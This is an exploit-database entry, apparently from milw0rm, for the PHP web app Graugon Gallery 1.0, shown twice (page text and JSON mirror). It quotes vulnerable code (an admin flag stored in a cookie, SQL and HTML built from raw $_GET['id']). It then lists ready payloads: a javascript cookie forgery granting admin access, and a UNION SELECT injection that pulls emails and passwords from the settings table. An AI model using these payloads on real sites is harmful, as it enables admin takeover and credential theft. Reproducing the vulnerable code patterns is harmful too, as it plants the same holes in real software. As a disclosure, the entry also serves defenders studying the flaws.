Search...

Graugon Gallery 1.0 XSS/SQL/Cookie Bypass Remote Vulnerabilities

2009-02-11T00:00:00

ID EDB-ID:8040
Type exploitdb
Reporter x0r
Modified 2009-02-11T00:00:00

Description

Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities. Webapps exploit for php platform

                                        
                                            #########################################################################################
[0x01] Informations:

Name           : Graugon Gallery  1.0
Download       : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1
Vulnerability  : Sql Injection/ Insecure Cookie Handling/XSS
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[Code]
$TwoMonths = 60 * 60 * 24 * 60 + time(); 
setcookie(g_admin, 1, $TwoMonths);
[/code]

Bugged file is /[path]/view.php

[Code]

$id = $_GET['id'];
...

$query = "SELECT * FROM g_gallery WHERE id=$id";
$result = mysql_query($query);
[/code]

[Code]

$id = $_GET['id'];

echo "....&lt;a href='view.php?id=" . $id . "'&gt; "

[/code]


#########################################################################################
[0x03] Exploits:

Exploit: 1- javascript:document.cookie ="g_admin=1; path=/"
         2- http://victim.it/view.php?id=-1337 union select
0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--
		    ( change number of columns)
		 3- ?id=[XSSCODE]

########################################################################################

# milw0rm.com [2009-02-11]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:8040", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Graugon Gallery 1.0 XSS/SQL/Cookie Bypass Remote Vulnerabilities", "description": "Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities. Webapps exploit for php platform", "published": "2009-02-11T00:00:00", "modified": "2009-02-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/8040/", "reporter": "x0r", "references": [], "cvelist": [], "lastseen": "2016-02-01T04:37:16", "viewCount": 8, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-02-01T04:37:16", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T04:37:16", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/8040/", "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : Graugon Gallery 1.0\nDownload : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1\nVulnerability : Sql Injection/ Insecure Cookie Handling/XSS\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian \n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/admin.php\n\n[Code]\n$TwoMonths = 60 * 60 * 24 * 60 + time(); \nsetcookie(g_admin, 1, $TwoMonths);\n[/code]\n\nBugged file is /[path]/view.php\n\n[Code]\n\n$id = $_GET['id'];\n...\n\n$query = \"SELECT * FROM g_gallery WHERE id=$id\";\n$result = mysql_query($query);\n[/code]\n\n[Code]\n\n$id = $_GET['id'];\n\necho \"....<a href='view.php?id=\" . $id . \"'> \"\n\n[/code]\n\n\n#########################################################################################\n[0x03] Exploits:\n\nExploit: 1- javascript:document.cookie =\"g_admin=1; path=/\"\n 2- http://victim.it/view.php?id=-1337 union select\n0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--\n\t\t ( change number of columns)\n\t\t 3- ?id=[XSSCODE]\n\n########################################################################################\n\n# milw0rm.com [2009-02-11]\n", "osvdbidlist": ["52047", "52046"]}